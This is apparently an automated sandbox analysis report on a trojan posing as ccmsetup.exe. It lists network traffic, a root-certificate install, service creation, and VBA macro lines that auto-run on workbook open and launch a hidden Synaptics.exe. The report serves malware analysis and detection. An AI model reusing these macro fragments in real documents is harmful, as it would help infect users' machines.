                              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49707 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49893 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49895 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49920 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49923 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49965 version: TLS 1.2

                              E-Banking Fraud

                              barindex
                              Registers a new ROOT certificate
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_006266DC __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CertAddCertificateContextToStore,GetLastError,GetCurrentThreadId,CertFreeCertificateContext,2_2_006266DC

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: aOkCiDht.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: ZGGKNSUKOP.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: aOkCiDht.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: ZGGKNSUKOP.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: aOkCiDht.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: ZGGKNSUKOP.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00604951: __EH_prolog3_catch,GetCurrentThreadId,GetFileAttributesW,GetLastError,GetCurrentThreadId,CreateFileW,GetLastError,GetCurrentThreadId,DeviceIoControl,GetLastError,GetCurrentThreadId,CloseHandle,2_2_00604951
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\LogsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\Logs\ccmsetup.logJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\cacheJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_006466BE2_2_006466BE
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005A671D2_2_005A671D
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005D283B2_2_005D283B
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005728B22_2_005728B2
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0064AF952_2_0064AF95
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0066D0982_2_0066D098
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005DD4732_2_005DD473
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0057F8E02_2_0057F8E0
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005879532_2_00587953
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00583BAA2_2_00583BAA
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: aOkCiDht.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: ZGGKNSUKOP.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D22BE appears 404 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D2223 appears 48 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F3B94 appears 41 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F0DBA appears 36 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F567F appears 83 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F52AF appears 50 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 00603360 appears 34 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005A162C appears 34 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D0C66 appears 36 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 00592624 appears 1010 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D0E41 appears 45 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 0060C143 appears 39 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F7229 appears 47 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F1811 appears 1078 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D2255 appears 418 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005BA4EE appears 49 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D22F4 appears 352 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 006743A3 appears 638 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005D2288 appears 64 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F511F appears 40 times
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: String function: 005F415F appears 85 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                              Source: ccmsetup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: ccmsetup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCXD7AF.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000C06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000C06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000000.2022999530.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2031437853.0000000002BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exeBinary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exeBinary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.bank.troj.expl.evad.winEXE@13/33@11/4
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005BB4AE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,2_2_005BB4AE
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0058D725 __EH_prolog3_catch_GS,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentThreadId,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetCurrentThreadId,InitiateSystemShutdownExW,GetLastError,GetCurrentThreadId,CloseHandle,2_2_0058D725
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00604016 CoCreateInstance,2_2_00604016
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005987A7 __EH_prolog3_catch_GS,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,2_2_005987A7
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0059BADB __EH_prolog3_catch,StartServiceCtrlDispatcherW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,2_2_0059BADB
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\Users\user\Desktop\._cache_ccmsetup.exeJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CcmsetupMutex
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2180
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
